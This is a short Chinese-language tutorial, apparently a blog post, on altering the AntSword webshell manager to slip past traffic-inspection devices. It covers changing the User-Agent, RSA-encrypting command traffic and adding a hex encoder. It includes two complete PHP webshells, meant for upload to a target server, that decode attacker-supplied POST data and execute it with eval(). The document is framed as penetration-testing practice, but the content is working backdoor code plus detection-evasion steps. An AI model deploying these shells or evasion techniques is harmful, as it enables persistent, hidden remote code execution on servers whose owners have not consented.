簡介
我們常常在測試過程中經常用到蟻劍,如果沒有修改一些特征,會被一些流量設備輕易的發現,所以在這里寫一下對蟻劍的一些特征進行修改
修改UA頭
新版本蟻劍已經將UA頭改為隨機獲取了,這里講一下老版本的
首先在蟻劍中設置代理到burp

在burp的數據包中能清楚的看到蟻劍的特征

在目錄/modules/request.js文件中修改UA頭

/modules/update.js文件修改

修改完后,UA就變為我們自己想要的頭了

流量加密
蟻劍支持rsa加密方式

直接使用自帶的shell上傳到目標服務器
<?php
$cmd = @$_POST['id'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCCVQo4Wjt9ZfRpZE4E+BBZ62E+
lWx178V16xzuYswqZuoCjo6Az9J/1wHySL73IQZgTZF5inPEfuW2Ep73aGSo0nLm
qckDmCuys7OSD+Ni2NjGzd5VQD2wP0he+TpcL7b0BJYEtdGqyGvuqZLECvtp8KTD
jukTOI/HBDUjCyhzhwIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
$cmd .= $de;
}
}
eval($cmd);
鏈接前得新建一個ras的編碼器,在鏈接shell的時候使用

鏈接的時候選擇我們剛才新建的編碼器

蟻劍鏈接shll后可看到請求包已被加密

除了使用自帶的一些編碼器之外,我們也可以直接寫編碼器,該github有一些編碼器的分享
這里測試一下hex的編碼,先添加一個hex的編碼器

上傳shell到服務器
<?php
foreach($_POST as $k => $v){$_POST[$k]=pack("H*", $v);}
@eval($_POST['id']);
?>
鏈接時選擇hex編碼器

數據已被編碼

